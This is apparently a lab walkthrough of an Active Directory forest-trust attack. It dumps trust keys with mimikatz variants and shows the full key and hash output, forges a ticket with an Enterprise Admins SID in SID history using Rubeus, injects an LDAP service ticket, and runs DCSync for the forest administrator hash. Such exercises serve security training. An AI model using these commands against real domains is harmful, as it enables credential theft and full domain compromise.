Now let’s Start Dumping Trust Keys
.\\BetterSafetyKatz.exe "lsadump::trust /patch"
As observed we got the trust keys
[us-dc]: PS C:\\Users\\Administrator\\Documents> .\\SafetyKatz.exe "lsadump::trust /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-163245708)
Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
[ In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 8/3/2024 9:15:55 PM - CLEAR - 3f 1f 5f 58 09 ab a5 71 a9 c8 dd 9f c9 1c bd 10 12 13 ed 3f af f7 9a 73 54 12 8c 8f 32 e3 b6 22 a1 96 fc 0a 3a b0 c9 15 1c fc 03 0a 94 17 de 9b a6 03 36 0d 69 f4 b3 8c 65 8d 34 a7 39 5a da 43 db 5d 96 69 96 6a cc 13 b8 ce 87 29 73 dd 26 23 2d 68 7e 8e 93 8b 45 96 c7 ef 8e 10 36 45 32 aa cd 1a 31 56 22 97 fa c1 67 c3 2d d5 02 78 9b a0 9a 80 10 e6 7b 0a 51 52 46 61 45 f7 d6 37 91 2a d7 76 5a 7d 47 3d 34 6d 63 de 41 aa 16 f3 80 bf e9 b6 e5 ba ef e9 33 d4 d4 b8 7e b1 1f b6 e5 20 ed a0 b7 73 99 cc cb e7 a2 e6 ed 18 da 24 48 cc d2 48 44 7d b3 e4 86 55 2d d7 02 6d 31 bd 88 20 ea 29 e5 4f b0 70 ae 53 cc 22 1e 9e 6d 12 88 db 91 07 f5 08 39 ac 1f 40 b7 9a 3d 05 45 2d 52 85 5a d2 a5 ef 19 83 18 69 60 21 3d 90 e0 af 5a 6a
* aes256_hmac bda73767bb3b8c171ef5e30db8defee77d2dfa79a79c80c2546be3dada08686e
* aes128_hmac 6c0e955a50d0e07238b4adf7577d13de
* rc4_hmac_nt 13766b82c578582d8c30707931ac3205
[ Out ] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:42 PM - CLEAR - 4d 11 82 fa b8 08 92 1d e7 75 e9 38 ba 04 60 03 29 0a 8d 74 ad d1 3f 28 d0 12 90 26 c4 26 c6 4f db d8 6b 3f 17 f7 c2 25 d7 7b d4 64 e6 8d 1c db d0 9b 20 95 a4 be 7b cd eb 6c c8 63 45 5b 72 a8 3d e9 7f c4 98 e2 88 6a 91 0a e5 10 91 d8 cf 63 79 6b fa 6e d8 85 3c 4a 75 01 eb 27 e7 70 ad 24 ad 91 a7 b0 a2 d1 c5 0d 7f 9e 10 7a ae e0 f6 86 9d 7d fe e3 a1 bc 30 91 13 a2 b1 7d 68 ae 12 d0 a7 11 30 1b 27 b4 c5 da a8 3e 00 08 71 b7 19 81 a7 7c 34 99 75 b8 8b 12 78 7d 5c 1a f3 1c cf 13 a0 3b 53 f9 06 42 4d 00 fa dc 20 bf cb eb c2 1b ff 86 85 56 0e 4f d4 8d 1a c3 a8 eb ad c3 47 bd 0a 52 59 d7 e6 32 e9 ff 6a e3 b8 0b df db 23 aa c6 d4 2b 68 f0 4c 6d 27 19 ac 76 ab 55 76 c0 80 c4 57 e5 e5 9e 47 5c 46 0f 1b 8a 51 7c 6c 22 8c
* aes256_hmac 83bf3baec1d31c65d85e53e2493def63a8d880fcaab2c8216104d207bbe4af2f
* aes128_hmac c82460b6bfabaf9d777e49a068981f83
* rc4_hmac_nt 43633ee7409ac1c8d4c36cdce6d42d1c
[ In-1] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 7/2/2024 2:23:14 AM - CLEAR - 1b 7a 9b 2f 25 70 ef cb 1a 80 8a 38 06 86 b1 8e 5d 55 99 20 d6 41 e1 8f 47 4c 61 94 0c 92 e0 35 05 0a 5b 50 8f 8c 34 89 9e dd 80 71 08 b4 d3 ec 62 2c ab 96 bd c0 9c 00 99 00 35 4a b7 c7 42 c2 5d 74 ee 15 1e 4a c1 fc 96 f9 7a fd 82 6b d2 38 41 23 27 a6 6d 3e 8c fe 9c f3 a8 c5 b4 c9 c5 d2 2d 6d 88 53 84 3a 77 9f 99 36 ce dc 9b 11 6c e9 dd ec 6e e9 91 2e 6d 30 42 0e 30 14 d6 3a 99 7b 6c 7a 2c 0f 10 6c cc 87 82 7f 96 04 09 c0 c9 72 2c fc e3 43 dc f2 22 73 cd 4b 37 d2 03 ee 1d b7 42 3d 70 c8 2d ff 4b 94 40 0f 3b 9c 45 2f 9e 23 c3 4e 08 38 62 93 3d 70 d6 1e 33 7b e4 f7 be 41 33 8b 39 70 a4 e2 ab 02 79 d4 2a 1c 33 1c 77 eb bb b6 a1 6d 29 67 4c d8 1c 62 61 b0 01 98 9a de fa 6d a0 f7 7b 81 4a 2f 51 26 7e 15 c8 b9 e0 50
* aes256_hmac 2c55b0ad2b33d441c445dfe52af1b6fc073af9e75c13b2301f1ddac10291bbe6
* aes128_hmac 80f118381c2df45328bfa6027449df3e
* rc4_hmac_nt b643e817a077f3e6952a096e169c3a90
[Out-1] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:42 PM - CLEAR - eb 5f b0 45 4b 91 2c ed ed b2 ac e4 88 69 75 40 66 d3 61 e1 83 60 55 59 c1 61 af e7 38 6f 6f 6f eb 89 e5 8b 5f ff 15 ae 1d 85 15 a1 e3 64 4f ce d5 64 b9 9d 7a 93 12 31 cb 56 13 16 9b 6a 53 de cc 42 72 1c 90 a7 bf 47 2a 58 aa b5 a4 0c 6b b8 7d 0b a1 0c 45 21 c4 d9 a5 9a 77 a5 15 fe d9 a2 8b d3 38 3f ec d1 ec f9 05 56 ab aa a4 d7 7a 11 7f 8b 01 af 21 2c 2d 7c 09 a8 f3 ec b1 8b 92 3d a8 d7 ad 84 fa 6a 25 87 af a9 03 a9 61 01 45 e1 27 e4 60 96 dd 4b d0 db 54 c0 45 e8 ef 03 e6 dc 58 c6 e1 0f fd 98 55 b8 01 42 15 54 bb c8 91 a0 6d ad fc 60 5d ff 2a 21 e2 a2 93 0a 9d da 7b 7d b8 cf 1b 38 b3 91 3b 71 e4 1a 37 4c c5 41 91 b3 d7 84 41 00 fe 12 6f fe e3 1a bc 9f 35 cf a6 33 5c ee 0b e0 e6 2f d6 0f ae 9f 98 65 04 a2 b5 54
* aes256_hmac c0ce0eeab0dcb212369a38f6a935dd29c20bc11c98f24b14e7419d0b45cad407
* aes128_hmac 276b93f90146bec6f85d9f78e6ba12ef
* rc4_hmac_nt e046fbb5f6bf7b6c1b40cd2d8265d0d3
Domain: EU.LOCAL (EU / S-1-5-21-3657428294-2017276338-1274645009)
[ In ] US.TECHCORP.LOCAL -> EU.LOCAL
* 8/3/2024 9:16:04 PM - CLEAR - db a7 c2 43 45 41 c9 17 c7 5c 27 4f 7d af 9d 87 a9 44 04 b8 68 76 10 ff 62 b7 43 4f e2 c0 c5 35 a3 44 12 33 6a f5 32 22 00 c4 c9 a7 79 13 23 57 3c 35 26 99 6a 56 57 ca 46 21 0f 84 7a 7a 9c fc 78 16 b7 0c 34 6b 7f 6e 16 b9 c8 b7 4e df 16 06 85 ac 57 49 2b 17 c8 74 b5 53 c0 da e5 00 a7 63 9b f6 16 2d a9 bd c3 fa e4 ad 79 18 f8 96 ef 42 0f 2a 21 69 00 13 a1 f1 4b 82 69 37 e9 5a dd 4a 38 28 ef bd 49 bf 01 9c 90 37 f8 68 83 4e 52 67 4e ff ce 3a 7a 9b 01 f2 2d dc 07 8f 7d 11 0d 36 d0 59 ef a3 1d c7 48 d0 4a a8 84 07 2e 32 98 2e 4f eb 73 55 e3 ee 0a 93 60 33 86 0c 17 81 fd 68 f8 b1 cb dd 54 dd a0 60 27 f5 0d c1 4c 25 b0 45 7f e4 ac 85 05 39 88 cf 89 f1 80 e7 e6 a8 0b 92 25 05 c9 79 81 7f 16 0f c2 a1 e1 e2 a1 99 ec 82
* aes256_hmac 8249f7eb9f5dff56ad607f99dfac1a81eb3729b80786919714e46876302ab9f6
* aes128_hmac b486c602ef93eda0389303e555d86206
* rc4_hmac_nt 358eebe5d44bcde30587c5b6de7f78a2
[ Out ] EU.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:44 PM - CLEAR - 3a 74 12 06 2f 7c 6a 80 75 d0 9a ba b5 dd 32 b5 11 ed dc 83 9e 6c ff a3 ff 4a ea 83 bb 82 66 17 b0 86 4c 5c 8d 75 42 bb a5 1a 45 cf 63 75 9c 26 3b d1 a4 57 78 e3 37 67 69 58 01 6d 23 db e7 68 76 2d 05 ba b0 99 58 d8 54 a0 6a 77 9d 88 d9 d5 79 65 cd 93 82 37 1e 5d cb 83 b1 87 33 fa a8 97 96 d6 e7 b8 92 24 10 62 f8 9c 24 61 e7 fa 29 a7 86 5b e4 6d f5 c1 af c1 48 82 c8 a1 5d 20 ae c7 c1 eb a6 cd 5c a3 6f ba 3f fd 91 6e 85 6e a4 39 2a d3 3a 69 1c 25 81 ba a9 c3 e6 e4 be d8 98 11 9a d8 0d ff 97 02 b6 a3 86 03 7e 3c a2 37 3d 24 e9 fd 28 3b 9b b4 bb cb f5 19 f2 7b ff 15 f4 b3 ee 56 7c 74 c8 df 33 0c a2 38 2a 9d 6f f2 64 0c cf 79 24 20 9d f1 fb 3b 76 fa b1 81 29 2f bc 52 38 41 5f ba da df 63 02 a0 a1 56 05 63 3f 93 af
* aes256_hmac 7d494967d2a5082aa84bde7652295b1951a37d777ee83673577c30831abba124
* aes128_hmac a688680a432cc6db648b90972c5c5323
* rc4_hmac_nt f298838cf059d286c0c9aa2ddf8c2c3f
[ In-1] US.TECHCORP.LOCAL -> EU.LOCAL
* 7/2/2024 2:23:24 AM - CLEAR - f9 72 64 10 2f a8 4f cb fa 49 67 ed c0 fa a0 42 ba 2c 34 f9 9a 7f 8b e0 a8 a2 0c 88 79 e5 3b 74 3e 6d ef b1 ac 17 a3 9e 01 74 b6 61 84 19 ed a4 5b ea 63 b6 51 61 e3 47 43 3f 82 8a 8c e0 b1 93 40 1f af fd f9 a0 ff e7 c0 e6 85 8e 23 a5 a9 d6 b9 14 06 4d 68 28 b9 3b e3 f8 1c 9c 06 a2 13 5d 84 84 e1 2a db db 0e 02 18 af 26 75 31 9a 69 99 50 f1 8a aa 49 ac db 57 4c 94 e2 c9 49 53 94 b9 33 a6 f7 fd 2f f5 d8 4d fd 1d 72 fd 81 63 56 da b7 47 91 a5 20 4c ad 8f b6 0e 74 ec cf d4 aa fb fe e3 71 1d 4f 2c ad 30 fe 3c fc 4a 51 ea 26 30 9c 65 7f e8 7e a0 6a 02 ba 56 a8 c1 98 41 cf cc e0 46 d9 34 dd 76 cc b9 7c f2 d6 44 e6 39 52 79 fe 65 48 3f 2b 35 f1 41 01 1c 4e b4 68 75 6a c7 f5 2d 70 6c b8 11 46 84 61 6d 02 bd 4f 46 5d 28
* aes256_hmac b9346f46206de34ff0453613a2537a7adfb7efac9b23f5fcebd3be6e89b40e40
* aes128_hmac 279c54f45d18d622c27cdbac530f4a8c
* rc4_hmac_nt d96eb104c123ff496e1e455bd0148244
[Out-1] EU.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:44 PM - CLEAR - 53 6f 40 b6 34 7d 12 32 e4 3b d4 7f ae a6 13 7e f4 e6 9e 94 fb 7a 02 41 a3 41 5f d2 e0 40 a1 b4 55 1d 71 5e fa 04 7c 12 62 01 a2 2a 44 cd b3 27 61 27 7e 23 c4 97 a3 b9 8d 37 1d 96 85 33 79 6b 46 22 51 f5 40 0d a2 70 ec 35 da 1c 0f f7 49 aa 1a 8f 2e 7f ec ef d4 a1 b9 0f 42 74 4b f0 4f a5 39 c5 31 5b d7 66 f9 bf 11 98 dc 7b 2b 97 30 c9 44 2a da a2 18 fe 9c c8 ee dd fc cd 66 fb 16 47 cb f4 ab b8 c6 a0 7f 65 2f d5 55 18 ef b5 19 98 48 c5 07 4f 5c 5e 33 9d 47 c2 cb e1 2d 8c 87 ec 72 d2 26 af be 27 a7 c6 b6 38 f7 80 75 1f 16 e5 b1 15 d3 6e 20 18 03 93 52 d5 25 6b a0 65 cb 05 4d 46 b4 91 91 35 ee 5e 0f fa 04 ca 77 a8 e3 b3 a2 3b 7e 2d a0 e2 79 b2 f6 07 76 e2 1f bb a9 ff 1b 84 9d d6 3b 8d 9c bb ee 5d 1b 7d d1 31 fa 1f
* aes256_hmac cf6e0066827faf9bbe43d3a0b11b0554680c5c91058f93e43da5a68003d1e5b2
* aes128_hmac 7b9221573761629ef7cba586cfecd607
* rc4_hmac_nt 147e82a078bae9756ff23d301339740f
Now let’s forge a silver ticket (service ticket)
.\\Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/techcorp.local /rc4:13766b82c578582d8c30707931ac3205 /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /nowrap
Now let’s forge a TGS
.\\Rubeus.exe asktgs /user:Administrator /service:ldap/techcorp-dc.techcorp.local /dc:techcorp-dc.techcorp.local /ticket:doIFyzCCBcegAwIBBaEDAgEWooIEvDCCBLhhggS0MIIEsKADAgEFoRMbEVVTLlRFQ0hDT1JQLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw50ZWNoY29ycC5sb2NhbKOCBG0wggRpoAMCARehAwIBA6KCBFsEggRXP3trnVJY2lEdc9tqYOS0gQTXNq/Gw81gcXpHaj4YByKe4QxaIuctV9Ap6imUOCty5rgaV1WOMgC283DfbuIknmvoUOGW5xAv+hIsclSaD+P51SzE64+80FKoG5tb1K/Z2MLYK89s0bGcs0w8Dwz4qSJ5zvAYJ7rkdX+xDstwh0vo0hWhQxrlA8SLawof+xnVMhiKkiJxt9T8pi2xFGKHlbf+VnQlanB/OA05z9TtipgTYu+Lp3iAUhFAgFfg17tnas7AKqmqwh6iOrbAaI/8D1IoMCpzp9sikRrNpROptVElMRByPEn9nyyBXpaiB49Rtm7e1FNEqLRfy/cV010n7/S8KAwxjXdpYz7OWzPGTieQr1FRJFIofNdKTT0gtF3WeaHwkSxyjK9nLh7WY0bnk0qsMZzy1BMTVvzRiBYs6mVg7kExOMr6hjEHObSj3pUDYcBY+Qcv4unl4HfZJlnfZspXsa9PrgjPykt0mexWMBcH6+4lKFFPNVcMJ10lfxe0JvTWOitd6rXcZNz3xmN1SF+TVeIeDYXGIybRU1eRXVQAYzGwg9MMdNBm5O5lPzPYglD3PH1Vt56YipPGdq5N38Hn5fNFXmdI2T3IcEmBO7G5lZAKBPaECQqya1n0AUljpU5rb+XL2/It+PR7h//hQEhq6yrj7+DhnvhXpGJ9sTnjjQN3gcsKQTPcRml2OQdbLdjq7AWCyknp5quq7XewPS/ZQ3tMuU6u6oVOriyh9pS7OMJ/2/yEKBTYZLYvzfttEPD+n1vSkyR39UolejyfPoXfSU+N0D5DEUaQ4yhRsCBGpo0DwaEXJl/Tax2Cp19zQgKPAJWo3ICCFNr77b9Rnj0F64XZn5bl/4e562qTw6oq/Y9tgZt3M5DPm3aU/seibIZ685lvH/k91XyCOC8v3XW3C23ZT3bw3KE8ZPmGCidgJUpP5czzqYSA+296b1n385KFqr25M+VQOV6K68O2SjdzK97ZTvmPNecOIC8iVAdKv4LR0tqjycyXnPAnqMUWccpQy8kxBL+MR+U7m1gs6ZiP7EVgiaQMp7kYhixk0GPosVmVih2y556g96fMrvqw13IcSLkvVzqLIk8fgeCCa0RDgeDz4Fril+1YYDHEcutGNW1FN/v50c2j1cl++njWyaivNb1xnP0w4IThMyjQc45gYsPFwfT+AE+LpQq9Pn4Cp6tPRHar/8yj41U6o4368eczFogeuRV70d6qE+/tX+s1VxRv2M+pplQqcEnO7NJVCRCTdS93cnpPgrtn1b4kvzIp24av1fFtZioebpqVWXkdjTlPNKDH03mleqYH8O3TGLV3RLH4ZSsyTCmlGVin5s3T60ZfIVQ8BFaxUoNLWnbhVtB8VZsP8zfff4nV65ZLW9/b32/Sz+lIUgN/CqH/sSrhw7Ow4c8HXbQWjXiXTAqqGWrOa8ixgU7rULwZpNm3zkpqDF+N7PL2CNtMmvd/Re1HRvR9FaOB+jCB96ADAgEAooHvBIHsfYHpMIHmoIHjMIHgMIHdoBswGaADAgEXoRIEEBTx48tma4c47LlewRBjBoGhExsRVVMuVEVDSENPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBAoAAApBEYDzIwMjQwODA0MTYxMTA0WqURGA8yMDI0MDgwNDE2MTEwNFqmERgPMjAyNDA4MDUwMjExMDRapxEYDzIwMjQwODExMTYxMTA0WqgTGxFVUy5URUNIQ09SUC5MT0NBTKkjMCGgAwIBAqEaMBgbBmtyYnRndBsOdGVjaGNvcnAubG9jYWw= /ptt
We got access to LDAP service so we can DCSync the Techcorp domain
.\\BetterSafetyKatz.exe "lsadump::dcsync /user:techcorp\\administrator /domain:techcorp.local" "exit"
And we got the Enterprise administrator hash